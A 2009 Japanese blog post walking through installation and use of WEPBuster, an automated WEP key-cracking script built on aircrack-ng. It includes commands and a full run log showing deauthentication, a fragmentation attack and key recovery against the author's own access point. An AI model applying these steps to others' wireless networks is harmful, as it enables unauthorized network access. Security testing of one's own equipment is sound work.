So-net無料ブログ作成

【 Aircrack-ng 自動化プログラム WEPBuster 1.0】 [Aircrack-ng]

WEPBuster は perl で書かれた WEP クラック自動化スクリプトで、Aircrack-ng を利用している。
aircrack-ng のバージョンは 1.0 rc4 以上が必要だ。

 

2009/10/9 記
BT4 で wepbuster インストールは apt-get で簡単にできる。

apt-get update
apt-get install wepbuster

(以上でインストール終了)
cd /pentest/wireless/wepbuster
perl wepbuster

wepbuster - Project Hosting on Google Code

 

ここからスクリプトをダウンロードして tar で解凍する。 

wepbusterの特長は、

・MACアドレスフィルタリングをバイパスする。
・隠蔽されたSSIDを明らかにする。
・クライアントレスでインジェクション可能。> fragmentation attack
・共有キー認証?
・WEP Decloacking? 将来
・ホワイトリスト、ブラックリスト > APを限定

動画(youtube )は


perl スクリプトだから簡単に導入できると思っていたが、perl のモジュールをいくつかインストールするなど準備が大変だった。準備作業と実行結果を以下に記載するがかなり長文になると思う。

自分の実行環境は以下の通りだ。 

ネットブック MSI Wind U100、 内蔵無線LANカードは、Atheros AR5006EXS
OS,ソフトは、BackTrack 4 prefinal、aircrack-ng 1.0 final、madwifi-ng-r4073

自宅無線 LAN AP は(ソネットから借りている) Aterm WD735GV。

wepbuster を実行する前に、The CPAN Search Site - search.cpan.org からperl のモジュールをいくつかダウンロード、インストールしなければならない。

Term::ReadKey
Expect.pm
IO::Tty
http://search.cpan.org/~stsi/TermReadKey/
http://search.cpan.org/~rgiersig/Expect-1.21/
http://search.cpan.org/~rgiersig/IO-Tty-1.08/

 

TermReadKey-2.30.01.tar.gz
Expect-1.21.tar.gz
IO-Tty-1.08.tar.gz

全部解凍して、インストールする。ポイントは Expect の前に IO-tty をインストールする。
tar xvzf TermReadKey-2.30.01.tar.gz
cd TermReadKey-2.30.01
perl Makefile.PL
make
make test
make install
同様に IO-Tty と Expect もインストールする。

 

madwifi-ng の場合は先ず ath0 を monitor モードにする必要があった。

# airmon-ng stop ath0

 

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

# airmon-ng start wifi0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

その後 wepbuster を実行する。

# cd /home/atc500/wepbuster
# perl wepbuster

Detecting wireless interfaces...

---------------------------------------------------------

Found wifi0...
Getting monitor interface...
monitor interface --> ath0

---------------------------------------------------------

Found ath0...
Getting monitor interface...
monitor interface --> ath0

---------------------------------------------------------

Found ath1...
Getting monitor interface...
monitor interface --> ath1

Found 3 useable wireless card(s)

Select which one to use [1] (You HAVE 3 seconds)

1) ath0/ath0
2) ath0/ath0
3) ath1/ath1

=========================================================

No valid channel entered. Using the default ( US = 1 6 11 )

MODE: crack     (using: ath0/ath0 == XX:XX:XX:XX:XX:XX)
.
Scanning channel 6 for WEP-enabled Access Points
.....
Found 1 AP(s) on channel 6

     BSSID              IV      CHANNEL SSID           ASSOCIATED CLIENTS

xx:xx:xx:xx:xx:xx       2       6       MYAP         xx:xx:xx:xx:xx:xx

.
略(他の家のAP)

Total AP found: 2

Now starting to crack...

#########################################################

Pwning "MYAP" (xx:xx:xx:xx:xx:xx)     Wed Oct  7 17:11:08 2009
Checking for mac filtering...   NONE!! =)
Trying to associate...   SUCCESS!!!
Starting to inject...
Sending Deauth...
Counting IVs...(hit ENTER to skip this AP)
0....0.....0.
Still 0 after 10 seconds...
Sending Deauth...
Sending Deauth...
Counting IVs...
....2.....2.....11.....22.

Still 22 after 30 seconds. =(
This will take forever. Let's try Fragmentation!
Writing output to "fragattack.log"...    (try "tail -f fragattack.log")
Looking for data packets...
Trying replay_src-1007-171128.cap...
GOT KEYSTREAM!! -> fragment-1007-171155.xor
Replaying "forged_arp.cap"...

Fragmentation attack finished. Used 1 packets.
Counting IVs...
....1802.....3714.....5402.....7101.....8759.....10455.
....12103.....13840.....15527...
Collected 17265 IVs. Trying to crack...
KEY FOUND! [ XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: XXXXXXXXXXXX )  Decrypted correctly: 100%
OWNED USING 56832 IVs!
Elapsed Time: 03:28                     Wed Oct  7 17:14:36 2009
.Stopping all forks...

#########################################################

この様に自動でAPを探し出し、正規の無線LANクライアントがいない状況でも自動的にフラグメンテーションアタックをやってくれる。
よく分からないが米国仕様なのか、1,6,11 チャネルしかスキャンしてくれない。
perl wepbuster 8 と8チャネルを指定してもだめだった。(自宅APは いつも8 チャネルにしている)
それから、PCI GW-MF54G2 を持っているが、これは何度やってもだめだった。
フラグメンテーションアタックがうまくいかない AP もあるのかもしれない。 

チャネルの指定方法をご存知ならお教えください。


nice!(0)  コメント(1)  トラックバック(0) 

nice! 0

コメント 1

NO NAME

perl installation with standard libraries (threading support)
- perl modules (http://search.cpan.org)
- Term::ReadKey
- Expect.pm
- Getopt::Long
- File::Slurp
- Number::Range
- Algorithm::Permute
- Pod::Usage

- macchanger (www.alobbs.com/macchanger)

- miscellaneous unix programs
- ifconfig, iwconfig, rm, pkill, stty, cp, touch, mv, route, ping,
dhclient, netstat
by NO NAME (2010-03-06 21:07) 

コメントを書く

お名前:
URL:
コメント:
画像認証:
下の画像に表示されている文字を入力してください。

Facebook コメント

トラックバック 0